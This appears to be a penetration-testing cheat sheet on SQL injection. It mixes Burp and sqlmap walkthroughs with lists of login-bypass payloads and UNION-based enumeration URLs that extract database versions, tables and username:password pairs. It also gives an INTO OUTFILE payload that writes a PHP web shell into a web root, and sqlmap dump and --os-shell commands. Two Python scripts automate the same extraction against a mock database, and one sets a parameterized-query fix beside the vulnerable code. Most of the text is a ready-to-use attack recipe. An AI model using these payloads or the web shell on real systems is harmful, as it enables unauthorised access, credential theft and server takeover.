# SQL Injection

**1.** Browse to the target site: <http://testasp.vulnweb.com/Login.asp>\
**2.** Configure the Burp proxy and point the browser at Burp (**127.0.0.1:8080**), with intercept enabled in the Proxy tab.\
**3.** Click the submit button on the login form.\
**4.** Burp catches the **POST request** and holds it.

![](https://hackertarget.com/burp-testing-post-request.png)

**5.** Copy the POST request to a text file; I have called it search-test.txt and placed it in the sqlmap directory.\
**6.** Run sqlmap as shown here. The **-r** option tells sqlmap to read search-test.txt (the raw request as Burp shows it: request line, headers, blank line, body) to get the information to attack in the POST request; **-p** names the parameter to attack.

```
./sqlmap.py -r search-test.txt -p tfUPass
```

Testing for bypasses:

```
' or 1=1 LIMIT 1 --
' or 1=1 LIMIT 1 -- -
' or 1=1 LIMIT 1#
'or 1#
' or 1=1 --
' or 1=1 -- -
```

# SQLMAP

## sqlmap crawl

```
sqlmap -u http://172.21.0.0 --crawl=1
```

## sqlmap dump database

```
sqlmap -u http://172.21.0.0 --dbms=mysql --dump
```

## sqlmap shell

```
sqlmap -u http://172.21.0.0 --dbms=mysql --os-shell
```

# SQLI

Testing the number of columns (UNION-based; add or remove values until the page renders without an error):

```
http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8
```

Another simple test:

```
' or '1'='1
```

Other tests:

```
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
```

### POST parameters

You can also attempt to inject into parameters passed in POST requests, but you'll need an intercepting proxy such as Burp (or the Firefox Tamper Data extension) to view and edit them. The test is the same: append a `'` to the value, like `lang=en'`, and look for an error or a change in the response.

## Bypassing authentication

If you find a poorly-sanitized login page, you can attempt to log in without credentials by injecting into the username parameter so that the password check is commented out of the query (MySQL accepts `#` and `-- ` as comments; `--` must be followed by whitespace, hence the trailing `-`):

```
username' or 1=1;#
username'-- -
```
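To show why these payloads work, and why the `OR` variant only works in certain positions, here is an added example (not code from the original notes) with a login written two ways: the poorly-sanitized concatenation beside the parameterized version. It runs against a constructed in-memory SQLite database standing in for the lab's MySQL backend, so the MySQL-only `#` comment is left out and `-- -` is used instead; the `users` table, its rows and the function names are assumptions for the demonstration.

```python
import sqlite3

# Constructed in-memory database standing in for the lab's MySQL backend
# (added example, not code from the original notes). SQLite is used so this
# runs offline; quoting and AND/OR precedence behave the same in MySQL.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                 [(1, "admin", "s3cret"), (2, "bob", "hunter2")])


def login_vulnerable(username, password):
    """Poorly-sanitized login: the input is pasted straight into the SQL text."""
    sql = ("SELECT id, username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    return conn.execute(sql).fetchone()


def login_safe(username, password):
    """Same query with bound parameters: a quote in the input stays data."""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()


def try_payloads():
    """Runs the bypass payloads against both logins; returns (vulnerable, safe)
    results per case so the difference is visible side by side."""
    cases = {
        # comments out the password check; MySQL needs whitespace after '--'
        "comment":    ("admin'-- -", "wrong"),
        # username = 'admin' OR ('1'='1' AND password = 'wrong'): AND binds
        # tighter, so the row matches only because username = 'admin' is true
        "or-user":    ("admin' or '1'='1", "wrong"),
        # (username = 'nobody' AND password = '') OR '1'='1': whole WHERE is
        # true, so the first row (admin) comes back
        "or-pass":    ("nobody", "' or '1'='1"),
        # username = '' OR ('1'='1' AND password = 'wrong'): both sides false,
        # which is why the page's payloads comment out the rest of the query
        "or-no-user": ("' or '1'='1", "wrong"),
    }
    return {name: (login_vulnerable(u, p), login_safe(u, p))
            for name, (u, p) in cases.items()}


if __name__ == "__main__":
    for name, (vuln, safe) in try_payloads().items():
        print("%-10s vulnerable=%s safe=%s" % (name, vuln, safe))
```

The parameterized version returns `None` for every payload: the bound value is compared as a whole string, so the quote never closes the literal. The fix is the same in PHP (`PDO::prepare` with bound parameters) as it is here.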

## Database enumeration

The exact syntax for injection will vary by database type. In most lab scenarios, the database will be MySQL.

Get version:

```
http://[host]/inject.php?id=1 union all select 1,2,3,@@version,5
```

You can get the number of columns through trial and error using `order by`. Increase the column number by one per request until the database throws an error (MySQL reports `Unknown column 'N' in 'order clause'`); the last value that succeeds is the column count, and the `union all select` payloads below must use exactly that many values:

```
http://[host]/inject.php?id=54 order by 1
http://[host]/inject.php?id=54 order by 2
http://[host]/inject.php?id=54 order by 3
```

Get the current user:

```
http://[host]/inject.php?id=1 union all select 1,2,3,user(),5
```

See all tables:

```
http://[host]/inject.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables
```

Get column names for a specified table:

```
http://[host]/inject.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'
```

Get usernames and passwords (`0x3a` is the hex encoding of `:`, which avoids putting a quoted literal in the payload):

```
http://[host]/inject.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users
```
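The enumeration chain above (count the columns with `order by`, then swap `@@version`, `information_schema` queries and `concat()` into the echoed column) automated end to end, as an added example rather than code from the original page. It runs against a constructed in-memory SQLite database standing in for the MySQL target; `inject_php` is a hypothetical stand-in for the vulnerable `inject.php?id=` handler, and SQLite's `sqlite_version()`, `sqlite_master`, `pragma_table_info()` and `||` take the place of MySQL's `@@version`, `information_schema.tables`, `information_schema.columns` and `concat()`. The `products` and `users` tables are assumed.

```python
import sqlite3

# Constructed in-memory SQLite database standing in for the MySQL target
# (added example, not code from the original page).
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE products (id INTEGER, name TEXT, price REAL, stock INTEGER, note TEXT);
INSERT INTO products VALUES (1, 'widget', 9.99, 10, 'blue');
CREATE TABLE users (id INTEGER, name TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'bob', 'hunter2');
""")


def inject_php(id_param):
    """Hypothetical stand-in for inject.php?id=...: the parameter is concatenated
    into the query unquoted, as the vulnerable page does. Returns the result rows,
    or None when the database raises an error (the signal the ORDER BY probe uses)."""
    sql = "SELECT id, name, price, stock, note FROM products WHERE id=" + id_param
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None


def count_columns(max_cols=20):
    """ORDER BY n succeeds while n <= column count and errors after that; the
    last n that works is the number the UNION payloads must match."""
    for n in range(1, max_cols + 1):
        if inject_php("1 order by %d" % n) is None:
            return n - 1
    return None


def union_extract(expr, ncols, slot=3, from_clause=""):
    """Builds 'union all select 1,2,3,<expr>,5 ...' with expr in the column the
    page echoes back (column 4, index 3) and returns the injected values.
    id=-1 matches no real row, so only the injected rows come back."""
    cols = [str(i + 1) for i in range(ncols)]
    cols[slot] = expr
    rows = inject_php("-1 union all select %s %s" % (",".join(cols), from_clause))
    return None if rows is None else [row[slot] for row in rows]


def enumerate_target():
    """The page's chain: version, user tables, columns of 'users', credentials.
    SQLite equivalents replace the MySQL expressions named in the text."""
    n = count_columns()
    return {
        "columns": n,
        "version": union_extract("sqlite_version()", n)[0],
        "tables": union_extract("name", n,
                                from_clause="from sqlite_master where type='table'"),
        "users_columns": union_extract("name", n,
                                       from_clause="from pragma_table_info('users')"),
        "credentials": union_extract("name || ':' || password", n,
                                     from_clause="from users"),
    }


if __name__ == "__main__":
    for key, value in enumerate_target().items():
        print("%-14s %s" % (key, value))
```

Against a real target the `inject_php` stand-in becomes an HTTP request and "error" becomes whatever the page does on a failed query (a 500, an empty page, a missing row); the probing logic is otherwise identical, and it is exactly what `sqlmap --dbs`, `--tables` and `--dump` automate in the section below.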

Depending on the privileges of the database user, you may be able to write to the filesystem with MySQL's `INTO OUTFILE` clause and drop a PHP shell in the web root. This needs the `FILE` privilege, a `secure_file_priv` setting that does not restrict the target directory, and a web root writable by the account the MySQL service runs as:

```
http://[host]/inject.php?id=54 union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
```

I suspect you could inject a full reverse shell in there too...

## SQLmap

Assuming you've tested a parameter with `'` and it is injectable, run sqlmap against the URL:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbms=mysql
```

sqlmap may fail to identify the backend on its own; telling it the database type with `--dbms` avoids that and also skips the fingerprinting phase.

Get the databases:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dbs --dbms=mysql
```

Get the tables in a database:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --tables -D [database name]
```

Get the columns in a table:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --columns -D [database name] -T [table name]
```

Dump a table:

```
sqlmap -u "http://[host]/inject.php?param1=1&param2=whatever" --dump -D [database name] -T [table name]
```

### Passing tokens

If the injection point needs a session (or sits in a POST body), save the full request from Burp to a file and pass it with `-r`; sqlmap replays the headers, cookies and body from the file:

```
sqlmap -r request.txt
```

If you just need to pass a cookie:

```
sqlmap -u "http://[host]/inject.php" --cookie "PHPSESSID=foobar"
```

### REST-style URLs

If the URL has no query-string parameters (REST-style paths), mark the injection points with `*` and sqlmap tests those positions:

```
sqlmap -u "http://[host]/param1*/param2*"
```

